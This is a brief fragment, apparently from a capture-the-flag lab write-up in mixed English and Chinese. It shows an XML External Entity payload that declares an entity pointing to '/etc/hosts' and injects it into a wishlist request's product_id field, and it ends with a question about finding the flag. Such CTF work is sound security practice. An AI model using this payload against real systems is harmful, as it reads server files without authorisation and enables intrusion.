payload
1
2
3
4
5
6
7
8<!--?xml version="1.0" ?-->
<!DOCTYPE foo [<!ENTITY payload SYSTEM "/etc/hosts"> ]>
<wishlist>
<user_id>1</user_id>
<item>
<product_id>&payload;</product_id>
</item>
</wishlist>更新
xml
请求以包含对外部实体的引用
1 | What is the flag discovered after navigating through the wishes? |